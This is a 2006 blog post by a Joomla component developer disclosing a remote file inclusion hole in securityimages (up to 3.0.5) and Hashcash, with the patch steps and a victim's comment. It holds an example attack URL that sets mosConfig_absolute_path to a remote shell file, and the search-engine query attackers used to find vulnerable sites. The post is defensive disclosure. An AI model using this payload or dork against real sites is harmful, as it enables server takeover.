Whos Online

Joomla

We have 143 guests and 0 members online

    Forums

    We have 23 guests and 0 members online

      Tags

      android (7) anonymity (9) ant (10) apache (54) apple (7) atv (18) australia (8) bernardet (7) bombardier (7) book (7) browser (10) business (8) caliber30 (61) canon (9) cedricwalter (6) checklist (9) chrome (6) classpath (6) collection (7) continuousbuild (25) design (13) designpattern (23) desktop (7) development (28) DIY (9) draganflyer5 (9) dslr (14) eclipse (30) ek4 (8) electronic (18) enfrancais (66) FAQ (6) figures (13) firefox (20) firmware (7) flash (9) flickr (6) framework (12) fud (9) game (19) gaming (6) girls (6) google (68) gpl (8) gps (9) hacking (23) hdtv (7) hollidays (15) homecinema (14) homepage (20) howto (66) infrastructure (6) innoveo (7) iphone (6) italy (10) itsatrap (8) java (73) javascript (11) joke (11) joomla (215) joomla15 (33) joomlacloud (7) junit (9) kde (10) kyosho (62) links (17) linux (122) LittleBigPlanet (16) mambo (18) manual (8) manurhin (9) maps (6) maven (36) mediacenter (9) microsoft (52) modding (10) module (17) morespeed (16) motor (8) motorcycle (13) myhomepage (14) mysql (14) nas (14) neogeo (20) opencomment (27) opensource (61) opensuse (10) oss (7) p2p (7) patch (32) pc (12) pdf (8) php (26) picasa (7) plugin (65) privacy (9) projector (11) protection (7) ps3 (42) publicity (9) quad (18) raptor30 (7) rchelicopter (161) review (32) robot (9) robotic (7) rss (8) safety (8) scooter (29) security (62) securityimage (8) securityimage3 (6) securityimage4 (21) securityimage5 (19) securityimages (14) securityimages5 (6) server (17) simulator (8) smugmug (12) snk (16) software (31) sony (38) spammer (7) statistics (13) storage (7) subversion (6) suse (12) switzerland (7) teamcity (15) testing (9) thundertiger (20) tips (31) tomcat (7) tomtom (7) translatetofrench (8) trip (17) troubleshooting (7) tutorial (9) twitter (6) upgrade (15) vespa (10) video (17) vintage (8) watercooling (9) web2.0 (28) windows (14) xbmc (7) xbox (10) zurich (16) zürich (11)

      Forums

      Live information from Open Source Joomla! 1.0/1.5 development and support for waltercedric.com components/plugins/modules

      Skype me

      My status

      Follow me

      Facebook Digg LinkedIn MySpace Twitter Playstation network Xbox Live
      Digg Del.icio.us Reddit Simpy StumbleUpon Ask Facebook Slashdot Backflip Spurl MisterWong Netvouz Diigo Segnalo RawSugar Shadows Google Furl Newsvine Yahoo Technorati Live Blogmarks Netscape Fark Wink LinkaGoGo Bibsonomy FeedMe Magnolia Blue Tailrank Del.irio.us Y PlugIM SpotBack LinkSwarm

      Gallery

      Twitter

      Google Buzz


      Hotel lusso - Trova e prenota in un click i migliori Hotel lusso selezionati per qualità e prezzo in tutte le principali città Italiane ed Europee. Trova vari modi per risparimare con alb...
      7 hours ago,

      Re: No related articles are displayed - Not in my case. I have much more than one article in the categorie...
      12:07 AM Mar 14, 2010,

      Re: Rocket Themes templates - Cedric, thanks for working on it! I have run the xdelta3 program to get the new template, but then it won't allow me to unzip the resulting file to patch the server. I had to use the -s switch to get the source file recognized so my code looks l...
      11:24 PM Mar 13, 2010,

      Re: Rocket Themes templates - Hello again... I have more information Cedric. When I go into the contact details I want to display the captcha on, I get an error. Warning: file_get_contents(/home/mico7284/public_html/islandtrader.info/administrator/components/com_contact/contact_ite...
      10:22 PM Mar 13, 2010,

      Re: Rocket Themes templates - Cedric YOU ROCK! Thanks so much for the patch on crystalline template! I now have captcha on my log in form... however, it is not showing up on my contact form... See attached jpeg for a screen shot of the error I get for the contact patch under check ...
      10:05 PM Mar 13, 2010,
       
      Security risk in securityimages Print E-mail
      User Rating: / 1
      PoorBest 
      Tuesday, 01 August 2006 19:58


      The webmaster of janwiersma.com sent me an email today
      at 6:12AM , his server was hacked because of a bug in
      securityimages. This bug allows a remote atacker to
      execute commands via remote forceful include and
      execute function on your server
      and affect ALL version of securityimages <= 3.0.5

      Here are all files which put your server at risk:
      client.php, configinsert.php, lang.php, server.php

      Example of attack:
      http://web/components/com_securityimages/
      configinsert.php?mosConfig_absolute_path=http://shell.txt
      from http://securityreason.com/exploitalert/892
      Secunia has also a report on it: http://secunia.com/product/11186/
      In fact I forget to use that line in these files:
      defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
      This avoid any requests to access directly this file. 

      - upgrade to 3.0.6 (download at Joomla Forge or in my download sections) OR
      - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

      Please also contact all Your friends which are using securityimages!

      And for my other components?

      Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

      - upgrade to 1.2.2  (download at Joomla Forge or in my download sections) OR
      - patch the faulty files by hand (add defined('_VALID_MOS') or die('Direct Access to this location is not allowed.'); at the beginning of each file)

      JoomlaCloud is NOT affected





      YOU ARE ALL URGE TO UPGRADE ASAP!

      Related Posts

      relatedArticles

      Tags See All Tags Add New Tag...

      Please Enter New Tags Separated By Comma's
        Or Close

      bug  joomla  securityimage3  upgrade 



      Comments
      Add New Search RSS
      +/-
      Write comment
      Name:
      Email:
       
      Website:
      Title:
      UBBCode:
      [b] [i] [u] [url] [quote] [code] [img] 
       
       
      :):grin;)8):p:roll:eek:upset:zzz:sigh:?:cry
      :(:x
       
      Please input the anti-spam code that you can read in the image.
      Jan Wiersma  - 2 sites got hacked |82.161.149.xxx |2006-08-02 17:25:38
      Yes.. janwiersma.com and sepp.nl got hacked by this bug :cry



      After the hack i disabled SecurityImage but that does not work; if not upgrading
      to 3.0.6 then you have to uninstall the component to be safe !



      Finding out the hack entry was easy: after the hack, i checked the Webalizer
      logs and saw this:



      "Top 1 of 1 Total Search Strings: allinurl: com_securityimages"



      People looking (google-ing) for 'com_securityimages' ending up on my website ?
      That must be the leak!



      So a quick google on 'com_securityimages & exploid' gives the answer:

      http://securityreason.com/exploitalert/892[URL=htt
      p://securityreason.com/exploitalert/892
      >http://securityreason.com/exploitalert/892[/URL > 8)
      Last Updated on Thursday, 17 August 2006 21:54
       

      Top 200 Tags

      Donation

      Thank You for supporting my work
      Click Here to make a donation